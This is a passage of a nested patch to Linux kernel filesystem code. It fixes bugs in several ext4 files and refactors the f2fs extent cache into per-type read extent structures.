++		}
+ 		if (!entry->e_value_inum && entry->e_value_size) {
+ 			size_t offs = le16_to_cpu(entry->e_value_offs);
+ 			if (offs < min_offs)
+ 				min_offs = offs;
+ 		}
++		entry = next;
+ 	}
+ 	free = min_offs -
+ 		((void *)entry - (void *)IFIRST(header)) - sizeof(__u32);
+@@ -351,7 +361,7 @@ static int ext4_update_inline_data(handle_t *handle, struct inode *inode,
+ 
+ 	error = ext4_xattr_ibody_get(inode, i.name_index, i.name,
+ 				     value, len);
+-	if (error == -ENODATA)
++	if (error < 0)
+ 		goto out;
+ 
+ 	BUFFER_TRACE(is.iloc.bh, "get_write_access");
+@@ -1178,6 +1188,7 @@ static int ext4_finish_convert_inline_dir(handle_t *handle,
+ 		ext4_initialize_dirent_tail(dir_block,
+ 					    inode->i_sb->s_blocksize);
+ 	set_buffer_uptodate(dir_block);
++	unlock_buffer(dir_block);
+ 	err = ext4_handle_dirty_dirblock(handle, inode, dir_block);
+ 	if (err)
+ 		return err;
+@@ -1252,6 +1263,7 @@ static int ext4_convert_inline_data_nolock(handle_t *handle,
+ 	if (!S_ISDIR(inode->i_mode)) {
+ 		memcpy(data_bh->b_data, buf, inline_size);
+ 		set_buffer_uptodate(data_bh);
++		unlock_buffer(data_bh);
+ 		error = ext4_handle_dirty_metadata(handle,
+ 						   inode, data_bh);
+ 	} else {
+@@ -1259,7 +1271,6 @@ static int ext4_convert_inline_data_nolock(handle_t *handle,
+ 						       buf, inline_size);
+ 	}
+ 
+-	unlock_buffer(data_bh);
+ out_restore:
+ 	if (error)
+ 		ext4_restore_inline_data(handle, inode, iloc, buf, inline_size);
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index 42003b5c4cadc..ffc810436ef21 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -3503,7 +3503,7 @@ static int ext4_iomap_overwrite_begin(struct inode *inode, loff_t offset,
+ 	 */
+ 	flags &= ~IOMAP_WRITE;
+ 	ret = ext4_iomap_begin(inode, offset, length, flags, iomap, srcmap);
+-	WARN_ON_ONCE(iomap->type != IOMAP_MAPPED);
++	WARN_ON_ONCE(!ret && iomap->type != IOMAP_MAPPED);
+ 	return ret;
+ }
+ 
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 9dad93059945b..912c4a1093fe5 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -4820,7 +4820,11 @@ ext4_mb_release_group_pa(struct ext4_buddy *e4b,
+ 	trace_ext4_mb_release_group_pa(sb, pa);
+ 	BUG_ON(pa->pa_deleted == 0);
+ 	ext4_get_group_no_and_offset(sb, pa->pa_pstart, &group, &bit);
+-	BUG_ON(group != e4b->bd_group && pa->pa_len != 0);
++	if (unlikely(group != e4b->bd_group && pa->pa_len != 0)) {
++		ext4_warning(sb, "bad group: expected %u, group %u, pa_start %llu",
++			     e4b->bd_group, group, pa->pa_pstart);
++		return 0;
++	}
+ 	mb_free_blocks(pa->pa_inode, e4b, bit, pa->pa_len);
+ 	atomic_add(pa->pa_len, &EXT4_SB(sb)->s_mb_discarded);
+ 	trace_ext4_mballoc_discard(sb, NULL, group, bit, pa->pa_len);
+diff --git a/fs/ext4/mmp.c b/fs/ext4/mmp.c
+index 588cb09c5291f..23930ed3cbda6 100644
+--- a/fs/ext4/mmp.c
++++ b/fs/ext4/mmp.c
+@@ -39,28 +39,36 @@ static void ext4_mmp_csum_set(struct super_block *sb, struct mmp_struct *mmp)
+  * Write the MMP block using REQ_SYNC to try to get the block on-disk
+  * faster.
+  */
+-static int write_mmp_block(struct super_block *sb, struct buffer_head *bh)
++static int write_mmp_block_thawed(struct super_block *sb,
++				  struct buffer_head *bh)
+ {
+ 	struct mmp_struct *mmp = (struct mmp_struct *)(bh->b_data);
+ 
+-	/*
+-	 * We protect against freezing so that we don't create dirty buffers
+-	 * on frozen filesystem.
+-	 */
+-	sb_start_write(sb);
+ 	ext4_mmp_csum_set(sb, mmp);
+ 	lock_buffer(bh);
+ 	bh->b_end_io = end_buffer_write_sync;
+ 	get_bh(bh);
+ 	submit_bh(REQ_OP_WRITE | REQ_SYNC | REQ_META | REQ_PRIO, bh);
+ 	wait_on_buffer(bh);
+-	sb_end_write(sb);
+ 	if (unlikely(!buffer_uptodate(bh)))
+ 		return -EIO;
+-
+ 	return 0;
+ }
+ 
++static int write_mmp_block(struct super_block *sb, struct buffer_head *bh)
++{
++	int err;
++
++	/*
++	 * We protect against freezing so that we don't create dirty buffers
++	 * on frozen filesystem.
++	 */
++	sb_start_write(sb);
++	err = write_mmp_block_thawed(sb, bh);
++	sb_end_write(sb);
++	return err;
++}
++
+ /*
+  * Read the MMP block. It _must_ be read from disk and hence we clear the
+  * uptodate flag on the buffer.
+@@ -346,7 +354,11 @@ skip:
+ 	seq = mmp_new_seq();
+ 	mmp->mmp_seq = cpu_to_le32(seq);
+ 
+-	retval = write_mmp_block(sb, bh);
++	/*
++	 * On mount / remount we are protected against fs freezing (by s_umount
++	 * semaphore) and grabbing freeze protection upsets lockdep
++	 */
++	retval = write_mmp_block_thawed(sb, bh);
+ 	if (retval)
+ 		goto failed;
+ 
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 56f09598448b4..5a3dbbabe23af 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -674,7 +674,7 @@ static struct stats dx_show_leaf(struct inode *dir,
+ 				len = de->name_len;
+ 				if (!IS_ENCRYPTED(dir)) {
+ 					/* Directory is not encrypted */
+-					ext4fs_dirhash(dir, de->name,
++					(void) ext4fs_dirhash(dir, de->name,
+ 						de->name_len, &h);
+ 					printk("%*.s:(U)%x.%u ", len,
+ 					       name, h.hash,
+@@ -709,8 +709,9 @@ static struct stats dx_show_leaf(struct inode *dir,
+ 					if (IS_CASEFOLDED(dir))
+ 						h.hash = EXT4_DIRENT_HASH(de);
+ 					else
+-						ext4fs_dirhash(dir, de->name,
+-						       de->name_len, &h);
++						(void) ext4fs_dirhash(dir,
++							de->name,
++							de->name_len, &h);
+ 					printk("%*.s:(E)%x.%u ", len, name,
+ 					       h.hash, (unsigned) ((char *) de
+ 								   - base));
+@@ -720,7 +721,8 @@ static struct stats dx_show_leaf(struct inode *dir,
+ #else
+ 				int len = de->name_len;
+ 				char *name = de->name;
+-				ext4fs_dirhash(dir, de->name, de->name_len, &h);
++				(void) ext4fs_dirhash(dir, de->name,
++						      de->name_len, &h);
+ 				printk("%*.s:%x.%u ", len, name, h.hash,
+ 				       (unsigned) ((char *) de - base));
+ #endif
+@@ -849,8 +851,14 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
+ 	hinfo->seed = EXT4_SB(dir->i_sb)->s_hash_seed;
+ 	/* hash is already computed for encrypted casefolded directory */
+ 	if (fname && fname_name(fname) &&
+-				!(IS_ENCRYPTED(dir) && IS_CASEFOLDED(dir)))
+-		ext4fs_dirhash(dir, fname_name(fname), fname_len(fname), hinfo);
++	    !(IS_ENCRYPTED(dir) && IS_CASEFOLDED(dir))) {
++		int ret = ext4fs_dirhash(dir, fname_name(fname),
++					 fname_len(fname), hinfo);
++		if (ret < 0) {
++			ret_err = ERR_PTR(ret);
++			goto fail;
++		}
++	}
+ 	hash = hinfo->hash;
+ 
+ 	if (root->info.unused_flags & 1) {
+@@ -1111,7 +1119,12 @@ static int htree_dirblock_to_tree(struct file *dir_file,
+ 				hinfo->minor_hash = 0;
+ 			}
+ 		} else {
+-			ext4fs_dirhash(dir, de->name, de->name_len, hinfo);
++			err = ext4fs_dirhash(dir, de->name,
++					     de->name_len, hinfo);
++			if (err < 0) {
++				count = err;
++				goto errout;
++			}
+ 		}
+ 		if ((hinfo->hash < start_hash) ||
+ 		    ((hinfo->hash == start_hash) &&
+@@ -1313,8 +1326,12 @@ static int dx_make_map(struct inode *dir, struct buffer_head *bh,
+ 		if (de->name_len && de->inode) {
+ 			if (ext4_hash_in_dirent(dir))
+ 				h.hash = EXT4_DIRENT_HASH(de);
+-			else
+-				ext4fs_dirhash(dir, de->name, de->name_len, &h);
++			else {
++				int err = ext4fs_dirhash(dir, de->name,
++						     de->name_len, &h);
++				if (err < 0)
++					return err;
++			}
+ 			map_tail--;
+ 			map_tail->hash = h.hash;
+ 			map_tail->offs = ((char *) de - base)>>2;
+@@ -1452,10 +1469,9 @@ int ext4_fname_setup_ci_filename(struct inode *dir, const struct qstr *iname,
+ 	hinfo->hash_version = DX_HASH_SIPHASH;
+ 	hinfo->seed = NULL;
+ 	if (cf_name->name)
+-		ext4fs_dirhash(dir, cf_name->name, cf_name->len, hinfo);
++		return ext4fs_dirhash(dir, cf_name->name, cf_name->len, hinfo);
+ 	else
+-		ext4fs_dirhash(dir, iname->name, iname->len, hinfo);
+-	return 0;
++		return ext4fs_dirhash(dir, iname->name, iname->len, hinfo);
+ }
+ #endif
+ 
+@@ -2298,10 +2314,15 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
+ 	fname->hinfo.seed = EXT4_SB(dir->i_sb)->s_hash_seed;
+ 
+ 	/* casefolded encrypted hashes are computed on fname setup */
+-	if (!ext4_hash_in_dirent(dir))
+-		ext4fs_dirhash(dir, fname_name(fname),
+-				fname_len(fname), &fname->hinfo);
+-
++	if (!ext4_hash_in_dirent(dir)) {
++		int err = ext4fs_dirhash(dir, fname_name(fname),
++					 fname_len(fname), &fname->hinfo);
++		if (err < 0) {
++			brelse(bh2);
++			brelse(bh);
++			return err;
++		}
++	}
+ 	memset(frames, 0, sizeof(frames));
+ 	frame = frames;
+ 	frame->entries = entries;
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index 2528e8216c334..d542f068ca99f 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -3195,11 +3195,9 @@ static __le16 ext4_group_desc_csum(struct super_block *sb, __u32 block_group,
+ 	crc = crc16(crc, (__u8 *)gdp, offset);
+ 	offset += sizeof(gdp->bg_checksum); /* skip checksum */
+ 	/* for checksum of struct ext4_group_desc do the rest...*/
+-	if (ext4_has_feature_64bit(sb) &&
+-	    offset < le16_to_cpu(sbi->s_es->s_desc_size))
++	if (ext4_has_feature_64bit(sb) && offset < sbi->s_desc_size)
+ 		crc = crc16(crc, (__u8 *)gdp + offset,
+-			    le16_to_cpu(sbi->s_es->s_desc_size) -
+-				offset);
++			    sbi->s_desc_size - offset);
+ 
+ out:
+ 	return cpu_to_le16(crc);
+@@ -6568,9 +6566,6 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	}
+ 
+ #ifdef CONFIG_QUOTA
+-	/* Release old quota file names */
+-	for (i = 0; i < EXT4_MAXQUOTAS; i++)
+-		kfree(old_opts.s_qf_names[i]);
+ 	if (enable_quota) {
+ 		if (sb_any_quota_suspended(sb))
+ 			dquot_resume(sb, -1);
+@@ -6580,6 +6575,9 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 				goto restore_opts;
+ 		}
+ 	}
++	/* Release old quota file names */
++	for (i = 0; i < EXT4_MAXQUOTAS; i++)
++		kfree(old_opts.s_qf_names[i]);
+ #endif
+ 	if (!test_opt(sb, BLOCK_VALIDITY) && sbi->s_system_blks)
+ 		ext4_release_system_zone(sb);
+@@ -6590,6 +6588,13 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	return 0;
+ 
+ restore_opts:
++	/*
++	 * If there was a failing r/w to ro transition, we may need to
++	 * re-enable quota
++	 */
++	if ((sb->s_flags & SB_RDONLY) && !(old_sb_flags & SB_RDONLY) &&
++	    sb_any_quota_suspended(sb))
++		dquot_resume(sb, -1);
+ 	sb->s_flags = old_sb_flags;
+ 	sbi->s_mount_opt = old_opts.s_mount_opt;
+ 	sbi->s_mount_opt2 = old_opts.s_mount_opt2;
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index b17c1b90e1224..b1b8fe86ccdbd 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -2564,6 +2564,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 		.in_inode = !!entry->e_value_inum,
+ 	};
+ 	struct ext4_xattr_ibody_header *header = IHDR(inode, raw_inode);
++	int needs_kvfree = 0;
+ 	int error;
+ 
+ 	is = kzalloc(sizeof(struct ext4_xattr_ibody_find), GFP_NOFS);
+@@ -2586,7 +2587,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 			error = -ENOMEM;
+ 			goto out;
+ 		}
+-
++		needs_kvfree = 1;
+ 		error = ext4_xattr_inode_get(inode, entry, buffer, value_size);
+ 		if (error)
+ 			goto out;
+@@ -2625,7 +2626,7 @@ static int ext4_xattr_move_to_block(handle_t *handle, struct inode *inode,
+ 
+ out:
+ 	kfree(b_entry_name);
+-	if (entry->e_value_inum && buffer)
++	if (needs_kvfree && buffer)
+ 		kvfree(buffer);
+ 	if (is)
+ 		brelse(is->iloc.bh);
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index 770a606eb3f6a..de6b056f090b3 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -1134,7 +1134,7 @@ void f2fs_update_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr)
+ {
+ 	dn->data_blkaddr = blkaddr;
+ 	f2fs_set_data_blkaddr(dn);
+-	f2fs_update_extent_cache(dn);
++	f2fs_update_read_extent_cache(dn);
+ }
+ 
+ /* dn->ofs_in_node will be returned with up-to-date last block pointer */
+@@ -1203,7 +1203,7 @@ int f2fs_get_block(struct dnode_of_data *dn, pgoff_t index)
+ 	struct extent_info ei = {0, };
+ 	struct inode *inode = dn->inode;
+ 
+-	if (f2fs_lookup_extent_cache(inode, index, &ei)) {
++	if (f2fs_lookup_read_extent_cache(inode, index, &ei)) {
+ 		dn->data_blkaddr = ei.blk + index - ei.fofs;
+ 		return 0;
+ 	}
+@@ -1224,7 +1224,7 @@ struct page *f2fs_get_read_data_page(struct inode *inode, pgoff_t index,
+ 	if (!page)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	if (f2fs_lookup_extent_cache(inode, index, &ei)) {
++	if (f2fs_lookup_read_extent_cache(inode, index, &ei)) {
+ 		dn.data_blkaddr = ei.blk + index - ei.fofs;
+ 		if (!f2fs_is_valid_blkaddr(F2FS_I_SB(inode), dn.data_blkaddr,
+ 						DATA_GENERIC_ENHANCE_READ)) {
+@@ -1486,7 +1486,7 @@ int f2fs_map_blocks(struct inode *inode, struct f2fs_map_blocks *map,
+ 	pgofs =	(pgoff_t)map->m_lblk;
+ 	end = pgofs + maxblocks;
+ 
+-	if (!create && f2fs_lookup_extent_cache(inode, pgofs, &ei)) {
++	if (!create && f2fs_lookup_read_extent_cache(inode, pgofs, &ei)) {
+ 		if (f2fs_lfs_mode(sbi) && flag == F2FS_GET_BLOCK_DIO &&
+ 							map->m_may_create)
+ 			goto next_dnode;
+@@ -1696,7 +1696,7 @@ skip:
+ 		if (map->m_flags & F2FS_MAP_MAPPED) {
+ 			unsigned int ofs = start_pgofs - map->m_lblk;
+ 
+-			f2fs_update_extent_cache_range(&dn,
++			f2fs_update_read_extent_cache_range(&dn,
+ 				start_pgofs, map->m_pblk + ofs,
+ 				map->m_len - ofs);
+ 		}
+@@ -1741,7 +1741,7 @@ sync_out:
+ 		if (map->m_flags & F2FS_MAP_MAPPED) {
+ 			unsigned int ofs = start_pgofs - map->m_lblk;
+ 
+-			f2fs_update_extent_cache_range(&dn,
++			f2fs_update_read_extent_cache_range(&dn,
+ 				start_pgofs, map->m_pblk + ofs,
+ 				map->m_len - ofs);
+ 		}
+@@ -2202,7 +2202,7 @@ int f2fs_read_multi_pages(struct compress_ctx *cc, struct bio **bio_ret,
+ 	if (f2fs_cluster_is_empty(cc))
+ 		goto out;
+ 
+-	if (f2fs_lookup_extent_cache(inode, start_idx, &ei))
++	if (f2fs_lookup_read_extent_cache(inode, start_idx, &ei))
+ 		from_dnode = false;
+ 
+ 	if (!from_dnode)
+@@ -2636,7 +2636,7 @@ int f2fs_do_write_data_page(struct f2fs_io_info *fio)
+ 		set_new_dnode(&dn, inode, NULL, NULL, 0);
+ 
+ 	if (need_inplace_update(fio) &&
+-			f2fs_lookup_extent_cache(inode, page->index, &ei)) {
++	    f2fs_lookup_read_extent_cache(inode, page->index, &ei)) {
+ 		fio->old_blkaddr = ei.blk + page->index - ei.fofs;
+ 
+ 		if (!f2fs_is_valid_blkaddr(fio->sbi, fio->old_blkaddr,
+@@ -3361,7 +3361,7 @@ restart:
+ 	} else if (locked) {
+ 		err = f2fs_get_block(&dn, index);
+ 	} else {
+-		if (f2fs_lookup_extent_cache(inode, index, &ei)) {
++		if (f2fs_lookup_read_extent_cache(inode, index, &ei)) {
+ 			dn.data_blkaddr = ei.blk + index - ei.fofs;
+ 		} else {
+ 			/* hole case */
+@@ -3402,7 +3402,7 @@ static int __find_data_block(struct inode *inode, pgoff_t index,
+ 
+ 	set_new_dnode(&dn, inode, ipage, ipage, 0);
+ 
+-	if (f2fs_lookup_extent_cache(inode, index, &ei)) {
++	if (f2fs_lookup_read_extent_cache(inode, index, &ei)) {
+ 		dn.data_blkaddr = ei.blk + index - ei.fofs;
+ 	} else {
+ 		/* hole case */
+diff --git a/fs/f2fs/debug.c b/fs/f2fs/debug.c
+index a216dcdf69418..a9baa121d829f 100644
+--- a/fs/f2fs/debug.c
++++ b/fs/f2fs/debug.c
+@@ -72,15 +72,23 @@ static void update_general_status(struct f2fs_sb_info *sbi)
+ 	si->main_area_zones = si->main_area_sections /
+ 				le32_to_cpu(raw_super->secs_per_zone);
+ 
+-	/* validation check of the segment numbers */
++	/* general extent cache stats */
++	for (i = 0; i < NR_EXTENT_CACHES; i++) {
++		struct extent_tree_info *eti = &sbi->extent_tree[i];
++
++		si->hit_cached[i] = atomic64_read(&sbi->read_hit_cached[i]);
++		si->hit_rbtree[i] = atomic64_read(&sbi->read_hit_rbtree[i]);
++		si->total_ext[i] = atomic64_read(&sbi->total_hit_ext[i]);
++		si->hit_total[i] = si->hit_cached[i] + si->hit_rbtree[i];
++		si->ext_tree[i] = atomic_read(&eti->total_ext_tree);
++		si->zombie_tree[i] = atomic_read(&eti->total_zombie_tree);
++		si->ext_node[i] = atomic_read(&eti->total_ext_node);
++	}
++	/* read extent_cache only */
+ 	si->hit_largest = atomic64_read(&sbi->read_hit_largest);
+-	si->hit_cached = atomic64_read(&sbi->read_hit_cached);
+-	si->hit_rbtree = atomic64_read(&sbi->read_hit_rbtree);
+-	si->hit_total = si->hit_largest + si->hit_cached + si->hit_rbtree;
+-	si->total_ext = atomic64_read(&sbi->total_hit_ext);
+-	si->ext_tree = atomic_read(&sbi->total_ext_tree);
+-	si->zombie_tree = atomic_read(&sbi->total_zombie_tree);
+-	si->ext_node = atomic_read(&sbi->total_ext_node);
++	si->hit_total[EX_READ] += si->hit_largest;
++
++	/* validation check of the segment numbers */
+ 	si->ndirty_node = get_pages(sbi, F2FS_DIRTY_NODES);
+ 	si->ndirty_dent = get_pages(sbi, F2FS_DIRTY_DENTS);
+ 	si->ndirty_meta = get_pages(sbi, F2FS_DIRTY_META);
+@@ -294,10 +302,16 @@ get_cache:
+ 				sizeof(struct nat_entry_set);
+ 	for (i = 0; i < MAX_INO_ENTRY; i++)
+ 		si->cache_mem += sbi->im[i].ino_num * sizeof(struct ino_entry);
+-	si->cache_mem += atomic_read(&sbi->total_ext_tree) *
++
++	for (i = 0; i < NR_EXTENT_CACHES; i++) {
++		struct extent_tree_info *eti = &sbi->extent_tree[i];
++
++		si->ext_mem[i] = atomic_read(&eti->total_ext_tree) *
+ 						sizeof(struct extent_tree);
+-	si->cache_mem += atomic_read(&sbi->total_ext_node) *
++		si->ext_mem[i] += atomic_read(&eti->total_ext_node) *
+ 						sizeof(struct extent_node);
++		si->cache_mem += si->ext_mem[i];
++	}
+ 
+ 	si->page_mem = 0;
+ 	if (sbi->node_inode) {
+@@ -490,16 +504,18 @@ static int stat_show(struct seq_file *s, void *v)
+ 				si->bg_node_blks);
+ 		seq_printf(s, "BG skip : IO: %u, Other: %u\n",
+ 				si->io_skip_bggc, si->other_skip_bggc);
+-		seq_puts(s, "\nExtent Cache:\n");
++		seq_puts(s, "\nExtent Cache (Read):\n");
+ 		seq_printf(s, "  - Hit Count: L1-1:%llu L1-2:%llu L2:%llu\n",
+-				si->hit_largest, si->hit_cached,
+-				si->hit_rbtree);
++				si->hit_largest, si->hit_cached[EX_READ],
++				si->hit_rbtree[EX_READ]);
+ 		seq_printf(s, "  - Hit Ratio: %llu%% (%llu / %llu)\n",
+-				!si->total_ext ? 0 :
+-				div64_u64(si->hit_total * 100, si->total_ext),
+-				si->hit_total, si->total_ext);
++				!si->total_ext[EX_READ] ? 0 :
++				div64_u64(si->hit_total[EX_READ] * 100,
++				si->total_ext[EX_READ]),
++				si->hit_total[EX_READ], si->total_ext[EX_READ]);
+ 		seq_printf(s, "  - Inner Struct Count: tree: %d(%d), node: %d\n",
+-				si->ext_tree, si->zombie_tree, si->ext_node);
++				si->ext_tree[EX_READ], si->zombie_tree[EX_READ],
++				si->ext_node[EX_READ]);
+ 		seq_puts(s, "\nBalancing F2FS Async:\n");
+ 		seq_printf(s, "  - DIO (R: %4d, W: %4d)\n",
+ 			   si->nr_dio_read, si->nr_dio_write);
+@@ -566,8 +582,10 @@ static int stat_show(struct seq_file *s, void *v)
+ 			(si->base_mem + si->cache_mem + si->page_mem) >> 10);
+ 		seq_printf(s, "  - static: %llu KB\n",
+ 				si->base_mem >> 10);
+-		seq_printf(s, "  - cached: %llu KB\n",
++		seq_printf(s, "  - cached all: %llu KB\n",
+ 				si->cache_mem >> 10);
++		seq_printf(s, "  - read extent cache: %llu KB\n",
++				si->ext_mem[EX_READ] >> 10);
+ 		seq_printf(s, "  - paged : %llu KB\n",
+ 				si->page_mem >> 10);
+ 	}
+@@ -600,10 +618,15 @@ int f2fs_build_stats(struct f2fs_sb_info *sbi)
+ 	si->sbi = sbi;
+ 	sbi->stat_info = si;
+ 
+-	atomic64_set(&sbi->total_hit_ext, 0);
+-	atomic64_set(&sbi->read_hit_rbtree, 0);
++	/* general extent cache stats */
++	for (i = 0; i < NR_EXTENT_CACHES; i++) {
++		atomic64_set(&sbi->total_hit_ext[i], 0);
++		atomic64_set(&sbi->read_hit_rbtree[i], 0);
++		atomic64_set(&sbi->read_hit_cached[i], 0);
++	}
++
++	/* read extent_cache only */
+ 	atomic64_set(&sbi->read_hit_largest, 0);
+-	atomic64_set(&sbi->read_hit_cached, 0);
+ 
+ 	atomic_set(&sbi->inline_xattr, 0);
+ 	atomic_set(&sbi->inline_inode, 0);
+diff --git a/fs/f2fs/extent_cache.c b/fs/f2fs/extent_cache.c
+index 6c9e6f78a3e37..16692c96e7650 100644
+--- a/fs/f2fs/extent_cache.c
++++ b/fs/f2fs/extent_cache.c
+@@ -15,6 +15,122 @@
+ #include "node.h"
+ #include <trace/events/f2fs.h>
+ 
++bool sanity_check_extent_cache(struct inode *inode)
++{
++	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
++	struct f2fs_inode_info *fi = F2FS_I(inode);
++	struct extent_info *ei;
++
++	if (!fi->extent_tree[EX_READ])
++		return true;
++
++	ei = &fi->extent_tree[EX_READ]->largest;
++
++	if (ei->len &&
++		(!f2fs_is_valid_blkaddr(sbi, ei->blk,
++					DATA_GENERIC_ENHANCE) ||
++		!f2fs_is_valid_blkaddr(sbi, ei->blk + ei->len - 1,
++					DATA_GENERIC_ENHANCE))) {
++		set_sbi_flag(sbi, SBI_NEED_FSCK);
++		f2fs_warn(sbi, "%s: inode (ino=%lx) extent info [%u, %u, %u] is incorrect, run fsck to fix",
++			  __func__, inode->i_ino,
++			  ei->blk, ei->fofs, ei->len);
++		return false;
++	}
++	return true;
++}
++
++static void __set_extent_info(struct extent_info *ei,
++				unsigned int fofs, unsigned int len,
++				block_t blk, bool keep_clen,
++				enum extent_type type)
++{
++	ei->fofs = fofs;
++	ei->len = len;
++
++	if (type == EX_READ) {
++		ei->blk = blk;
++		if (keep_clen)
++			return;
++#ifdef CONFIG_F2FS_FS_COMPRESSION
++		ei->c_len = 0;
++#endif
++	}
++}
++
++static bool __may_read_extent_tree(struct inode *inode)
++{
++	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
++
++	if (!test_opt(sbi, READ_EXTENT_CACHE))
++		return false;
++	if (is_inode_flag_set(inode, FI_NO_EXTENT))
++		return false;
++	if (is_inode_flag_set(inode, FI_COMPRESSED_FILE) &&
++			 !f2fs_sb_has_readonly(sbi))
++		return false;
++	return S_ISREG(inode->i_mode);
++}
++
++static bool __init_may_extent_tree(struct inode *inode, enum extent_type type)
++{
++	if (type == EX_READ)
++		return __may_read_extent_tree(inode);
++	return false;
++}
++
++static bool __may_extent_tree(struct inode *inode, enum extent_type type)
++{
++	/*
++	 * for recovered files during mount do not create extents
++	 * if shrinker is not registered.
++	 */
++	if (list_empty(&F2FS_I_SB(inode)->s_list))
++		return false;
++
++	return __init_may_extent_tree(inode, type);
++}
++
++static void __try_update_largest_extent(struct extent_tree *et,
++						struct extent_node *en)
++{
++	if (et->type != EX_READ)
++		return;
++	if (en->ei.len <= et->largest.len)
++		return;
++
++	et->largest = en->ei;
++	et->largest_updated = true;
++}
++
++static bool __is_extent_mergeable(struct extent_info *back,
++		struct extent_info *front, enum extent_type type)
++{
++	if (type == EX_READ) {
++#ifdef CONFIG_F2FS_FS_COMPRESSION
++		if (back->c_len && back->len != back->c_len)
++			return false;
++		if (front->c_len && front->len != front->c_len)
++			return false;
++#endif
++		return (back->fofs + back->len == front->fofs &&
++				back->blk + back->len == front->blk);
++	}
++	return false;
++}
++
++static bool __is_back_mergeable(struct extent_info *cur,
++		struct extent_info *back, enum extent_type type)
++{
++	return __is_extent_mergeable(back, cur, type);
++}
++
++static bool __is_front_mergeable(struct extent_info *cur,
++		struct extent_info *front, enum extent_type type)
++{
++	return __is_extent_mergeable(cur, front, type);
++}
++
+ static struct rb_entry *__lookup_rb_tree_fast(struct rb_entry *cached_re,
+ 							unsigned int ofs)
+ {
+@@ -58,29 +174,6 @@ struct rb_entry *f2fs_lookup_rb_tree(struct rb_root_cached *root,
+ 	return re;
+ }
+ 
+-struct rb_node **f2fs_lookup_rb_tree_ext(struct f2fs_sb_info *sbi,
+-					struct rb_root_cached *root,
+-					struct rb_node **parent,
+-					unsigned long long key, bool *leftmost)
+-{
+-	struct rb_node **p = &root->rb_root.rb_node;
+-	struct rb_entry *re;
+-
+-	while (*p) {
+-		*parent = *p;
+-		re = rb_entry(*parent, struct rb_entry, rb_node);
+-
+-		if (key < re->key) {
+-			p = &(*p)->rb_left;
+-		} else {
+-			p = &(*p)->rb_right;
+-			*leftmost = false;
+-		}
+-	}
+-
+-	return p;
+-}
+-
+ struct rb_node **f2fs_lookup_rb_tree_for_insert(struct f2fs_sb_info *sbi,
+ 				struct rb_root_cached *root,
+ 				struct rb_node **parent,
+@@ -189,7 +282,7 @@ lookup_neighbors:
+ }
+ 
+ bool f2fs_check_rb_tree_consistence(struct f2fs_sb_info *sbi,
+-				struct rb_root_cached *root, bool check_key)
++				struct rb_root_cached *root)
+ {
+ #ifdef CONFIG_F2FS_CHECK_FS
+ 	struct rb_node *cur = rb_first_cached(root), *next;
+@@ -206,23 +299,12 @@ bool f2fs_check_rb_tree_consistence(struct f2fs_sb_info *sbi,
+ 		cur_re = rb_entry(cur, struct rb_entry, rb_node);
+ 		next_re = rb_entry(next, struct rb_entry, rb_node);
+ 
+-		if (check_key) {
+-			if (cur_re->key > next_re->key) {
+-				f2fs_info(sbi, "inconsistent rbtree, "
+-					"cur(%llu) next(%llu)",
+-					cur_re->key, next_re->key);
+-				return false;
+-			}
+-			goto next;
+-		}
+-
+ 		if (cur_re->ofs + cur_re->len > next_re->ofs) {
+ 			f2fs_info(sbi, "inconsistent rbtree, cur(%u, %u) next(%u, %u)",
+ 				  cur_re->ofs, cur_re->len,
+ 				  next_re->ofs, next_re->len);
+ 			return false;
+ 		}
+-next:
+ 		cur = next;
+ 	}
+ #endif
+@@ -237,6 +319,7 @@ static struct extent_node *__attach_extent_node(struct f2fs_sb_info *sbi,
+ 				struct rb_node *parent, struct rb_node **p,
+ 				bool leftmost)
+ {
++	struct extent_tree_info *eti = &sbi->extent_tree[et->type];
+ 	struct extent_node *en;
+ 
+ 	en = f2fs_kmem_cache_alloc(extent_node_slab, GFP_ATOMIC, false, sbi);
+@@ -250,16 +333,18 @@ static struct extent_node *__attach_extent_node(struct f2fs_sb_info *sbi,
+ 	rb_link_node(&en->rb_node, parent, p);
+ 	rb_insert_color_cached(&en->rb_node, &et->root, leftmost);
+ 	atomic_inc(&et->node_cnt);
+-	atomic_inc(&sbi->total_ext_node);
++	atomic_inc(&eti->total_ext_node);
+ 	return en;
+ }
+ 
+ static void __detach_extent_node(struct f2fs_sb_info *sbi,
+ 				struct extent_tree *et, struct extent_node *en)
+ {
++	struct extent_tree_info *eti = &sbi->extent_tree[et->type];
++
+ 	rb_erase_cached(&en->rb_node, &et->root);
+ 	atomic_dec(&et->node_cnt);
+-	atomic_dec(&sbi->total_ext_node);
++	atomic_dec(&eti->total_ext_node);
+ 
+ 	if (et->cached_en == en)
+ 		et->cached_en = NULL;
+@@ -275,61 +360,51 @@ static void __detach_extent_node(struct f2fs_sb_info *sbi,
+ static void __release_extent_node(struct f2fs_sb_info *sbi,
+ 			struct extent_tree *et, struct extent_node *en)
+ {
+-	spin_lock(&sbi->extent_lock);
++	struct extent_tree_info *eti = &sbi->extent_tree[et->type];
++
++	spin_lock(&eti->extent_lock);
